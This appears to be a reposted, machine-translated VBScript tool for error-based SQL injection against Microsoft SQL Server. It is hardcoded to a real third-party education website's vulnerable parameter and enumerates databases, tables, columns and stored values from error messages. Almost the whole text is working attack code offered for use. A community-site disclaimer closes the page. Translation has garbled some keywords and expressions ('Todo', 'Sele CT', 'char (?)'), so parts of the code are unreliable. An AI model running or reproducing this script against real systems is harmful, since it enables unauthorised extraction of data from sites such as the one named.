Author: tr4c3
In order to preserve the versatility of the script, the use of and (select Col_name (object_id (' tablename '), N) =0 is discarded.
' To return to the Korean characters can be modified 121 or 136 lines, more settings to modify their own
' More features Please join us
Const methods = "Get" Submit method please modify here, there is got and post optional
Const DisPlay = "D" ' S saved to file, D output to screen
Dim Strurl_b, strURL, I, K, myarray, Strarg, STRD
Strurl_b = "Http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120 '" is based on the uncertainty of the injection point, please manually change here
Cardinality of i = 1 ' Library
k = 0 ' Cardinality of tables and fields
MyArray = Split (Strurl_b, "?",-1, 1)
strURL = myarray (0) ' Fetch URL
Strarg = myarray (1) ' Take parameters
Set Args = wscript.arguments
If args.count = 0 Then
Showu
End If
' If args.count =1 and LCase (Args (0))
'************************************************************************
' Burst vault
'************************************************************************
If Args.count =1 Then
If LCase (Trim (Args (0)) = "Databases" Then
Resut ("---------------===============================--------------")
Resut ("All the DataBases:")
Todo
Strdata = "and QuoteName (db_name (" &i& ")) =0--"
Sqlinj (strdata)
i = i + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
ElseIf LCase (Trim (Args (0)) = "Info" Then
Resut ("---------------===============================--------------")
Resut ("The current Database is:")
Strdata = "and QuoteName (Db_name ()) =0--"
Sqlinj (strdata)
Resut ("---------------===============================--------------")
Resut ("The Database User is:")
Strdata = "and QuoteName (user) =0--"
Sqlinj (strdata)
Resut ("---------------===============================--------------")
Resut ("The System_user is:")
Strdata = "and QuoteName (system_user) =0--"
Sqlinj (strdata)
Resut ("---------------===============================--------------")
Wscript.Quit
End If
End If
'************************************************************************
' Burst table
'************************************************************************
If args.count=2 and LCase (Trim (Args (1)) = "Tables" Then
Resut ("---------------===============================--------------")
Resut ("The Tables of" & Args (0))
Todo
Strdata = "and" (select top 1 quotename (name) from "& Args (0) &". Dbo.sysobjects where Xtype=char (?) and name not In (select Top & k & "name from" &args (0) & ". Dbo.sysobjects where Xtype=char (85))) =0--"
Sqlinj (strdata)
K = k + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' Burst field
'************************************************************************
If args.count=3 and LCase (Trim (Args (2)) = "Cols" Then
Database = Args (0)
Table = Args (1)
TarGet = DataBase & ". dbo." & Table
Targetcol = Database & ". Dbo. Syscolumns "
Resut ("---------------===============================--------------")
Resut ("The Columns of" & TarGet)
Todo
Strdata = "and" (select top 1 quotename (name) from "& Targetcol &" Where id=object_id (' & TarGet & "') and Name not in (select top &k& name from "& Targetcol &" Where id=object_id (' & TarGet & ')) =0--"
Sqlinj (strdata)
K = k + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' Burst field value
'************************************************************************
If args.count=4 and LCase (Trim (Args (3)) = "Values" Then
Database = Args (0)
Table = Args (1)
Col = Args (2)
Target = Database & ". dbo." & Table
Resut ("---------------===============================--------------")
Resut ("The Values of" & Args (2) & "in" &target)
Todo
Strdata = "and (select top 1 quotename (" & Col & ") from" & Target & "where" & Col & "(Sele CT Top "& K &" "& Col &" from "& Target &") =0--"
Sqlinj (strdata)
K = k + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
End If
Sub Sqlinj (value)
If UCase (method) = ' Get ' Then
Value = strarg & Value
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
Objxml.open "Get", strURL & "?" & Value, False
Objxml.setrequestheader "Referer", strURL
' Objxml.setrequestheader ' accept-language ', ' euc-kr '
Objxml.send ()
Strrevs = Objxml.responsetext ' default with this
' Strrevs = bytes2bstr (objxml.responsebody) ' Han Wen sometimes use this
If InStr (Strrevs, "' [") <>0 and InStr (Strrevs, "]") <>0 Then
STRD = Mid (Strrevs,instr (Strrevs, "' [") +2, InStr (Strrevs, "]")-InStr (Strrevs, "' [")-2)
Resut ("|_" &STRD)
Else
STRD = ""
End If
ElseIf UCase (method) = "POST" Then
Value = strarg & Value
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
Objxml.open "POST", strURL, False
Objxml.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Objxml.setrequestheader "Referer", strURL
Objxml.send (UrlEncode (value))
Strrevs = Objxml.responsetext ' default with this
' Strrevs = bytes2bstr (objxml.responsebody) ' Han Wen sometimes use this
If InStr (Strrevs, "' [") <>0 and InStr (Strrevs, "]") <>0 Then
STRD = Mid (Strrevs,instr (Strrevs, "' [") +2, InStr (Strrevs, "]")-InStr (Strrevs, "' [")-2)
Resut ("|_" &STRD)
Else
STRD = ""
End If
End If
End Sub
Function Resut (Strinfo)
If UCase (DisPlay) = "S" Then
Set fso = CreateObject ("Scripting.FileSystemObject")
Set FSO1 = fso. OpenTextFile ("Result.txt", 8,true)
Fso1. WriteLine (Strinfo)
Fso1. Close
Set FSO = Nothing
ElseIf UCase (DisPlay) = "D" Then
WScript.Echo (Strinfo)
End If
End Function
Function UrlEncode (str)
str = Replace (str, "", "+")
UrlEncode = str
End Function
Function Bytes2bstr (vIn)
Strreturn = ""
For i = 1 to LenB (vIn)
Thischarcode = AscB (MidB (vin,i,1))
If Thischarcode < &h80 Then
Strreturn = Strreturn & Chr (Thischarcode)
Else
Nextcharcode = AscB (MidB (vin,i+1,1))
Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode))
i = i + 1
End If
Next
Bytes2bstr = Strreturn
End Function
Sub Showu ()
With Wscript
. Echo ("+--------------------------=====================------------------------------+")
. Echo ("Sql2005 injection Auxiliary script (rough version), for MSSQL error mode by tr4c3[at]126[dot]com")
. Echo ("Usage:")
. Echo ("cscript"). scriptname& "info--explosion basic Information")
. Echo ("cscript"). scriptname& "databases--all the Library names")
. Echo ("cscript"). scriptname& "Pubs tables--, pubs, all user table names")
. Echo ("cscript"). scriptname& "Pubs authors cols--, pubs, Authors table, all field names")
. Echo ("cscript"). scriptname& "pubs authors au_id values--pubs.dbo.authors in Blast au_id")
. Echo ("+--------------------------=====================------------------------------+")
. Quit
End With
End Sub
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
